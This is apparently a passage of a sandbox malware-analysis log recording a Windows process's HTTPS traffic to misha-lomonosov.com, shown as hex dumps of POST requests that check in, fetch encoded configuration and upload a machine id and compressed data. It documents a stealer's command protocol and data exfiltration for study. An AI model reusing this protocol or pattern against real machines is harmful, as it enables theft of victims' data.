                                                                                              2025-01-12 08:13:02 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                                                              Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449731172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:03 UTC266OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2025-01-12 08:13:03 UTC1129INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:03 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=fs31icatht2qvi3uhl1f63tke2; expires=Thu, 08 May 2025 01:59:42 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z72VLNIpa%2B85IIvQKu6kS6FaG0k1StRwf2ojLVW04FmppzGMIyDnIhwUV%2FXLUqccFMAe3D2crpjLtdG7HDhGHFbPSTn3fv917TbLv%2FU7cwkPo0xdaTkr1hIyUL4YS%2B%2F3u3qHpui5"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf5f7fb75e70-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1559&rtt_var=598&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1810291&cwnd=228&unsent_bytes=0&cid=fc32cdd4e5861bb8&ts=501&x=0"
                                                                                              2025-01-12 08:13:03 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2025-01-12 08:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449732172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:04 UTC267OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 48
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:04 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79 32 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=atxOT1--noviy2&j=
                                                                                              2025-01-12 08:13:04 UTC1120INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:04 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=lbnrj3bj8docl70pv4d62dpdfk; expires=Thu, 08 May 2025 01:59:43 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bqk882kPMUruOF2q8UiSTNpXPwSpKMZYibJ4C0HeUwOYWuplJYIn4o13NT8BHKfMo5Ftq9CQiTphmLPAgFbzJnR52RoZxXb6SkX5fz8U8HFcQ11fAhxoRbG3VbdTEoH72P5y25eL"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf657a694237-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2384&min_rtt=1607&rtt_var=1158&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=951&delivery_rate=1817050&cwnd=194&unsent_bytes=0&cid=cc33b56f67b20884&ts=462&x=0"
                                                                                              2025-01-12 08:13:04 UTC249INData Raw: 31 63 63 38 0d 0a 76 70 72 33 47 38 69 69 37 70 76 31 7a 6b 66 67 7a 6f 54 31 42 59 59 79 4d 42 79 6f 64 48 69 62 7a 2f 62 54 71 6f 79 43 36 44 37 46 75 49 45 35 38 70 62 43 75 59 61 72 5a 64 71 36 39 6f 42 67 71 68 42 52 65 49 70 4f 48 76 71 6a 68 62 61 47 72 76 53 46 48 49 54 38 6c 6e 65 37 78 38 4b 35 6b 4c 5a 6c 32 70 58 2f 31 32 44 6f 45 41 6f 2b 7a 52 34 61 2b 71 4f 55 73 73 48 6a 38 6f 52 64 31 76 61 51 63 36 33 42 69 76 71 5a 6f 79 4b 46 71 2b 57 66 61 2b 39 66 57 48 47 4b 57 46 72 2b 74 64 54 70 69 4d 48 6e 6e 46 2f 7a 2b 34 52 77 36 74 2f 43 34 4e 65 72 4b 63 4c 30 70 70 52 67 35 46 35 57 65 4d 4d 63 45 50 4f 72 6c 62 66 41 2f 4f 75 4f 56 74 62 34 6b 33 4b 6e 79 4a 37 33 6b 36 51 70 67 36 48 6c 31 79 6d 6b 56 30 6f 2b 6b 6c 5a
                                                                                              Data Ascii: 1cc8vpr3G8ii7pv1zkfgzoT1BYYyMByodHibz/bTqoyC6D7FuIE58pbCuYarZdq69oBgqhBReIpOHvqjhbaGrvSFHIT8lne7x8K5kLZl2pX/12DoEAo+zR4a+qOUssHj8oRd1vaQc63BivqZoyKFq+Wfa+9fWHGKWFr+tdTpiMHnnF/z+4Rw6t/C4NerKcL0ppRg5F5WeMMcEPOrlbfA/OuOVtb4k3KnyJ73k6Qpg6Hl1ymkV0o+klZ
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 4a 79 36 36 46 6f 4e 33 6a 38 49 77 63 77 37 61 4d 4f 61 33 4d 7a 4b 48 58 70 43 6d 4d 71 65 57 59 59 4f 56 51 51 48 48 4b 46 52 4c 78 71 5a 36 2b 78 2b 48 75 67 46 76 55 38 5a 4a 32 72 63 69 4b 39 70 54 73 61 38 4b 72 2f 74 63 2f 70 48 42 43 66 63 6b 43 46 2b 6a 74 69 2f 2f 52 72 75 65 47 48 49 53 34 6b 33 65 72 7a 59 7a 72 6e 36 63 75 68 37 37 74 6e 6d 72 70 55 46 39 30 78 52 55 61 2f 71 65 65 76 73 4c 71 37 59 64 61 33 50 6a 56 4e 2b 72 48 6c 4c 6e 50 37 41 61 48 76 4f 47 62 63 61 5a 71 45 6d 47 45 44 31 72 2b 6f 64 54 70 69 4f 62 6c 69 56 2f 58 39 35 5a 78 6f 64 4b 4d 36 35 47 68 49 4a 43 71 34 35 6c 74 35 30 4a 59 63 4d 77 56 45 2f 4b 6b 6b 62 62 4d 72 71 37 4b 57 38 53 34 7a 54 6d 4c 7a 59 66 31 6e 62 73 6c 77 72 4f 6f 6a 69 66 6a 58 42 49 6d 69 68
                                                                                              Data Ascii: Jy66FoN3j8Iwcw7aMOa3MzKHXpCmMqeWYYOVQQHHKFRLxqZ6+x+HugFvU8ZJ2rciK9pTsa8Kr/tc/pHBCfckCF+jti//RrueGHIS4k3erzYzrn6cuh77tnmrpUF90xRUa/qeevsLq7Yda3PjVN+rHlLnP7AaHvOGbcaZqEmGED1r+odTpiObliV/X95ZxodKM65GhIJCq45lt50JYcMwVE/KkkbbMrq7KW8S4zTmLzYf1nbslwrOojifjXBImih
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 32 76 48 50 39 71 44 53 48 50 62 37 67 58 71 67 67 72 6e 36 6d 61 49 69 6c 4f 7a 35 32 58 36 6b 56 31 34 2b 6b 6c 59 58 2b 4b 57 53 6f 38 66 6a 34 34 52 53 30 2f 32 61 63 61 72 41 67 66 79 54 70 79 36 42 6f 65 4b 46 62 65 52 59 56 33 2f 41 48 46 71 33 37 5a 4f 70 69 4c 61 67 75 30 76 58 75 71 42 36 70 4d 36 4c 37 39 65 7a 61 35 76 73 34 5a 73 6e 76 42 42 66 64 73 38 54 46 66 69 6e 6d 72 54 43 34 75 69 45 58 38 37 33 6b 58 6d 6d 79 49 62 30 6d 61 67 74 69 36 66 74 6b 57 66 6c 57 68 49 77 69 68 45 43 75 66 58 55 68 63 2f 69 37 59 55 65 36 66 75 62 64 36 33 57 7a 4f 62 5a 74 57 57 46 6f 4b 62 50 4a 2b 68 5a 55 6e 58 41 45 68 72 2b 6f 4a 47 79 7a 2b 33 74 6a 56 62 53 2f 35 46 31 6f 38 32 4b 2b 5a 43 6f 49 4a 43 70 37 35 74 72 70 42 34 53 65 64 4a 57 51 72 6d
                                                                                              Data Ascii: 2vHP9qDSHPb7gXqggrn6maIilOz52X6kV14+klYX+KWSo8fj44RS0/2acarAgfyTpy6BoeKFbeRYV3/AHFq37ZOpiLagu0vXuqB6pM6L79eza5vs4ZsnvBBfds8TFfinmrTC4uiEX873kXmmyIb0magti6ftkWflWhIwihECufXUhc/i7YUe6fubd63WzObZtWWFoKbPJ+hZUnXAEhr+oJGyz+3tjVbS/5F1o82K+ZCoIJCp75trpB4SedJWQrm
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 4c 61 67 67 31 58 4f 39 70 74 77 70 38 61 45 2f 70 6d 68 4c 6f 53 6e 34 5a 42 68 36 56 68 66 65 38 6b 58 48 76 4f 2f 6c 37 72 43 34 2b 72 4b 45 70 7a 2f 6a 54 6e 79 67 4b 76 31 76 72 77 2b 6b 4c 71 6d 69 43 6e 39 45 46 56 79 69 6b 35 61 2b 71 4b 64 76 73 44 6d 37 34 56 59 30 76 36 54 64 4b 2f 50 68 75 75 66 6f 69 69 4a 6f 2b 32 46 5a 2b 6c 55 58 6e 72 43 48 52 43 35 34 39 53 32 30 4b 36 34 79 6d 6e 52 39 35 56 36 76 49 43 54 74 34 37 73 49 6f 37 73 76 74 64 72 36 6c 42 64 63 73 59 64 45 76 69 68 6d 72 62 4e 35 2b 69 43 54 74 33 38 6e 58 69 6b 7a 34 33 39 6b 71 6b 68 68 61 6a 67 6d 43 65 71 45 46 56 6d 69 6b 35 61 31 6f 71 68 38 2b 6e 55 6f 4a 55 53 78 62 69 53 64 65 71 59 7a 50 57 55 6f 43 32 4e 71 75 2b 62 62 65 31 62 58 6e 58 4f 47 68 50 38 71 35 57 30
                                                                                              Data Ascii: Lagg1XO9ptwp8aE/pmhLoSn4ZBh6Vhfe8kXHvO/l7rC4+rKEpz/jTnygKv1vrw+kLqmiCn9EFVyik5a+qKdvsDm74VY0v6TdK/PhuufoiiJo+2FZ+lUXnrCHRC549S20K64ymnR95V6vICTt47sIo7svtdr6lBdcsYdEvihmrbN5+iCTt38nXikz439kqkhhajgmCeqEFVmik5a1oqh8+nUoJUSxbiSdeqYzPWUoC2Nqu+bbe1bXnXOGhP8q5W0
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 31 56 7a 76 61 59 64 71 4c 49 68 66 69 54 71 53 69 45 6f 4f 79 57 59 4f 70 65 57 6a 36 45 56 68 33 68 37 63 7a 78 36 66 37 37 6d 45 72 52 32 5a 68 32 36 74 2f 43 34 4e 65 72 4b 63 4c 30 70 70 35 31 34 46 31 41 64 38 30 59 46 66 71 2f 6c 62 7a 44 2f 4f 65 46 57 4e 76 30 6b 33 61 73 77 59 6e 7a 6d 36 73 67 69 61 50 71 31 79 6d 6b 56 30 6f 2b 6b 6c 59 30 38 72 36 44 73 73 62 6c 39 70 45 63 77 37 61 4d 4f 61 33 4d 7a 4b 48 58 72 79 36 4a 71 4f 61 62 5a 2b 42 64 55 6d 7a 46 45 52 33 77 70 6f 61 37 7a 2b 6e 72 67 6c 66 54 2f 6f 64 31 70 4e 4b 4a 36 34 58 73 61 38 4b 72 2f 74 63 2f 70 47 5a 56 62 74 6f 56 57 4d 69 37 6c 36 66 44 34 2b 7a 4b 51 35 4c 68 31 58 36 6d 67 4e 53 35 6b 61 4d 73 67 61 50 6e 6e 6d 76 70 56 56 74 37 79 78 41 65 38 36 65 55 74 38 37 76 35
                                                                                              Data Ascii: 1VzvaYdqLIhfiTqSiEoOyWYOpeWj6EVh3h7czx6f77mErR2Zh26t/C4NerKcL0pp514F1Ad80YFfq/lbzD/OeFWNv0k3aswYnzm6sgiaPq1ymkV0o+klY08r6Dssbl9pEcw7aMOa3MzKHXry6JqOabZ+BdUmzFER3wpoa7z+nrglfT/od1pNKJ64Xsa8Kr/tc/pGZVbtoVWMi7l6fD4+zKQ5Lh1X6mgNS5kaMsgaPnnmvpVVt7yxAe86eUt87v5
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 2f 6d 54 6e 79 67 49 2f 2b 6c 4b 30 76 69 36 44 70 6b 47 50 32 57 6c 56 73 79 78 63 52 39 4b 47 55 76 4d 58 6b 34 59 4e 52 30 50 57 53 66 71 58 46 7a 4c 66 58 71 7a 33 43 39 4b 61 32 61 75 39 63 43 53 53 4b 43 56 54 67 37 5a 4f 39 69 4c 61 67 69 6c 62 5a 38 70 68 36 70 63 4f 65 2b 4a 47 2b 4a 59 2b 6d 39 4a 31 73 34 56 31 66 63 38 6b 51 48 50 4b 68 68 72 6a 49 37 65 76 4b 45 70 7a 2f 6a 54 6e 79 67 4b 2f 75 67 61 59 69 6a 72 72 74 6c 6d 54 79 58 55 49 2b 68 46 59 4c 2f 72 7a 55 36 64 37 2b 39 34 31 44 6b 75 48 56 66 71 61 41 31 4c 6d 52 70 53 4f 46 71 75 69 46 59 75 4a 66 58 58 66 44 45 68 4c 36 72 5a 43 31 7a 2b 76 6a 68 6c 66 62 2b 35 70 39 6f 38 36 46 39 74 66 69 5a 59 57 30 70 73 38 6e 78 55 74 52 63 73 64 57 42 62 65 30 31 4c 62 45 72 72 6a 4b 55 4e
                                                                                              Data Ascii: /mTnygI/+lK0vi6DpkGP2WlVsyxcR9KGUvMXk4YNR0PWSfqXFzLfXqz3C9Ka2au9cCSSKCVTg7ZO9iLagilbZ8ph6pcOe+JG+JY+m9J1s4V1fc8kQHPKhhrjI7evKEpz/jTnygK/ugaYijrrtlmTyXUI+hFYL/rzU6d7+941DkuHVfqaA1LmRpSOFquiFYuJfXXfDEhL6rZC1z+vjhlfb+5p9o86F9tfiZYW0ps8nxUtRcsdWBbe01LbErrjKUN
                                                                                              2025-01-12 08:13:04 UTC282INData Raw: 76 4d 57 4c 37 39 57 5a 4a 6f 79 69 34 59 45 6e 2b 32 38 63 50 73 55 4d 57 71 47 55 6a 66 48 50 34 71 44 53 48 4d 6e 2f 6c 58 36 77 31 6f 76 31 68 71 63 6f 6a 6f 37 70 6b 48 48 6e 58 31 46 76 77 31 6f 52 39 4f 33 61 38 63 2f 32 6f 4e 49 63 38 2f 2b 44 65 6f 58 44 6e 66 44 58 34 6d 57 46 75 71 62 50 4a 39 6f 51 51 48 33 61 46 52 58 6f 6b 39 54 70 30 64 43 67 67 55 72 62 36 4a 5a 76 6f 63 32 41 36 4b 6e 73 66 64 62 2b 74 4d 55 31 74 6b 38 53 59 66 56 59 57 76 6a 74 7a 49 6a 52 72 76 62 4b 42 49 36 32 31 57 76 71 6d 4d 79 2b 6c 4c 34 33 68 4b 2f 77 6c 43 44 61 62 6e 56 6f 77 42 45 4b 2f 72 71 62 38 59 61 75 37 38 6f 45 35 62 69 63 66 72 48 52 6d 76 53 48 71 32 57 39 34 71 61 50 4a 37 77 51 5a 33 33 45 47 42 33 76 76 4e 6d 57 33 75 54 6e 6d 6c 76 4c 39 39 55
                                                                                              Data Ascii: vMWL79WZJoyi4YEn+28cPsUMWqGUjfHP4qDSHMn/lX6w1ov1hqcojo7pkHHnX1Fvw1oR9O3a8c/2oNIc8/+DeoXDnfDX4mWFuqbPJ9oQQH3aFRXok9Tp0dCggUrb6JZvoc2A6Knsfdb+tMU1tk8SYfVYWvjtzIjRrvbKBI621WvqmMy+lL43hK/wlCDabnVowBEK/rqb8Yau78oE5bicfrHRmvSHq2W94qaPJ7wQZ33EGB3vvNmW3uTnmlvL99U
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 32 63 63 63 0d 0a 53 4f 62 6a 6a 66 48 65 72 72 6a 59 45 70 7a 71 31 53 48 71 68 34 2f 72 68 61 6f 6d 6c 4b 2b 68 71 56 6e 44 53 6c 39 34 33 51 63 6b 78 36 71 4f 76 4d 37 35 38 63 5a 4a 33 2f 61 62 66 72 79 41 77 72 6d 59 37 48 32 37 37 4b 37 58 57 4b 6f 51 53 6a 36 53 56 69 2f 36 6f 35 71 32 33 76 2b 74 72 55 62 52 2f 6f 4a 6f 36 6f 37 4d 2f 39 66 30 64 38 7a 73 34 6f 59 6e 76 41 41 41 4a 5a 39 46 54 61 6e 2f 69 2f 2f 52 72 76 62 4b 42 49 36 32 31 57 76 71 6d 4d 79 2b 6c 4c 34 33 68 4b 2f 77 6c 43 44 61 62 6e 78 35 7a 42 4d 64 36 65 2b 36 75 74 7a 70 6f 4d 51 63 30 37 6a 4e 51 4f 71 49 7a 4d 62 5a 37 44 33 43 39 4b 61 69 5a 4f 70 65 56 57 6a 62 57 7a 54 2b 71 35 47 32 32 4b 7a 4f 67 55 6a 62 75 4e 73 35 72 49 44 55 71 64 6e 73 49 5a 50 73 76 73 63 31 76
                                                                                              Data Ascii: 2cccSObjjfHerrjYEpzq1SHqh4/rhaomlK+hqVnDSl943Qckx6qOvM758cZJ3/abfryAwrmY7H277K7XWKoQSj6SVi/6o5q23v+trUbR/oJo6o7M/9f0d8zs4oYnvAAAJZ9FTan/i//RrvbKBI621WvqmMy+lL43hK/wlCDabnx5zBMd6e+6utzpoMQc07jNQOqIzMbZ7D3C9KaiZOpeVWjbWzT+q5G22KzOgUjbuNs5rIDUqdnsIZPsvsc1v
                                                                                              2025-01-12 08:13:04 UTC1369INData Raw: 46 4b 43 54 73 72 70 71 2f 7a 2f 6a 78 79 68 4b 63 39 39 55 68 6b 34 44 45 75 61 6a 69 5a 5a 72 73 76 74 64 53 35 31 35 63 65 64 77 48 56 39 36 6a 6b 37 44 65 2f 76 65 46 48 4a 4b 34 6b 7a 6e 79 6b 73 4b 35 6b 37 31 6c 32 76 79 30 7a 44 4b 33 42 77 49 73 31 56 67 44 75 62 76 55 36 5a 71 67 6f 4a 67 63 68 4c 6a 53 65 72 6a 53 69 76 71 42 72 32 4b 38 6b 73 47 5a 59 4f 56 47 51 6d 6e 46 57 54 54 50 6a 4b 71 50 33 65 33 75 68 46 76 4b 36 64 55 33 36 73 2f 4d 6f 61 37 73 62 63 4b 54 71 4e 64 2f 70 41 67 53 53 38 6b 59 46 50 36 37 68 66 7a 76 34 4f 65 4c 53 73 7a 76 6d 6a 61 45 39 71 32 35 32 65 77 6a 77 76 53 30 32 53 66 67 51 52 49 6d 6d 6b 52 42 72 50 37 44 34 5a 72 78 72 70 4d 63 79 72 6a 4e 4b 2b 53 41 6e 72 6e 50 37 47 4b 42 76 76 53 52 5a 50 4a 54 46 55
                                                                                              Data Ascii: FKCTsrpq/z/jxyhKc99Uhk4DEuajiZZrsvtdS515cedwHV96jk7De/veFHJK4kznyksK5k71l2vy0zDK3BwIs1VgDubvU6ZqgoJgchLjSerjSivqBr2K8ksGZYOVGQmnFWTTPjKqP3e3uhFvK6dU36s/Moa7sbcKTqNd/pAgSS8kYFP67hfzv4OeLSszvmjaE9q252ewjwvS02SfgQRImmkRBrP7D4ZrxrpMcyrjNK+SAnrnP7GKBvvSRZPJTFU


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449733172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:05 UTC281OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=0UN82NW8QTG35E
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18140
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:05 UTC15331OUTData Raw: 2d 2d 30 55 4e 38 32 4e 57 38 51 54 47 33 35 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 32 39 44 32 46 35 39 44 42 37 33 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 30 55 4e 38 32 4e 57 38 51 54 47 33 35 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 55 4e 38 32 4e 57 38 51 54 47 33 35 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79 32 0d 0a 2d 2d 30 55 4e 38 32 4e 57
                                                                                              Data Ascii: --0UN82NW8QTG35EContent-Disposition: form-data; name="hwid"A529D2F59DB73AF1B960CC18D99B375A--0UN82NW8QTG35EContent-Disposition: form-data; name="pid"2--0UN82NW8QTG35EContent-Disposition: form-data; name="lid"atxOT1--noviy2--0UN82NW
                                                                                              2025-01-12 08:13:05 UTC2809OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                                                                              Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                              2025-01-12 08:13:05 UTC1125INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:05 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=t4nbl1ar3j6inrtqkqdf68rrev; expires=Thu, 08 May 2025 01:59:44 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNnVpl6bmke%2FNiI9JRrtaADvJSVrRWeJHNX7HyOd5oIwmpD0nCb7u7TynZg3PjX673FQJTsEIoFtgTe8v8VOBu62B4rddBMZLwAsMZiL4KmGQbeO8O4JyaChj5WePoAif3rrthLO"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf6c18610f47-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1751&rtt_var=833&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2848&recv_bytes=19101&delivery_rate=1667618&cwnd=226&unsent_bytes=0&cid=70f66715a3972284&ts=771&x=0"
                                                                                              2025-01-12 08:13:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-12 08:13:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449734172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:06 UTC283OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=1SLZZCJ0YA40I2WE5
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8779
                                                                                              Host: misha-lomonosov.com
